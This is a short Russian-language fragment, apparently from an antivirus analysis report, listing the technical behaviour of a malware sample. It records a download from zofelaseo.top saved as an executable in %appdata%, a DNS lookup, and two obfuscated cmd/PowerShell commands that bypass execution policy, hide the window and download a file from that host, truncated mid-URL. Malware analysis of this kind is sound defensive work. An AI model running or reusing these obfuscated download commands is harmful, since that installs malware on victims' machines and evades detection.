Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^Er^SH^eLl^.^Ex^e ^-^eXec^uTiOn^POLi^C^y^ ^b^ypAS^s^ -n^OP^roFIL^E^ ^-W^i^NdO^wS^TYle HIdd^eN ^(n^eW^-oBJ^e^ct Syst^em^.nEt.WEbClI^eNT^).D^oWnlOA^D^F^ILE('http://zofelaseo.to...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "po^w^Er^SH^eLl^.^Ex^e ^-^eXec^uTiOn^POLi^C^y^ ^b^ypAS^s^ -n^OP^roFIL^E^ ^-W^i^NdO^wS^TYle HIdd^eN ^(n^eW^-oBJ^e^ct Syst^em^.nEt.WEbClI^eNT^).D^oWnlOA^D^F^ILE('http://zofelaseo.to...' (со скрытым окном)